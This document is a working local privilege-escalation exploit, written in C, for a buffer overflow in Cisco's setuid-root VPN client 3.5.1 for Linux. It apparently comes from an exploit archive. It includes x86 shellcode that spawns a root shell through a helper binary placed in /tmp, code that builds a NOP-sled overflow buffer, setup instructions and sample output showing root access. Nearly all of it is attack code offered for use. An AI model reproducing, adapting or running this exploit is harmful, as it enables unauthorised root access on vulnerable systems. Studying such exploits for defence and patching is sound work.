Cisco VPN client v3.5.1rel-k9 (Linux version) buffer overflow exploit which spawns a root shell.
633f9a2103f78fbe980489511980039e5e2dc812f61513bd2d269345191b799a
/* buffer overflow for cisco's vpnclient for linux
tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz
to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)
#include <stdio.h>
main() {
setuid(0);
execl("/bin/sh", "sh", NULL);
}
then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686
sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;
when you get a chance, check out http://sec.angrypacket.com
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
#define LEN 620 /* 520 to own eip */
/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";
unsigned long get_sp (void) {
__asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {
int i, offset=0;
long addr;
char *buf, *ptr;
if(argc > 1) offset = atoi(argv[1]);
buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() - offset;
printf("addr: 0x%x, offset: %d\n", addr, offset);
for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}
for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}
ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN - 1] = '\0';
execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
return(0);
}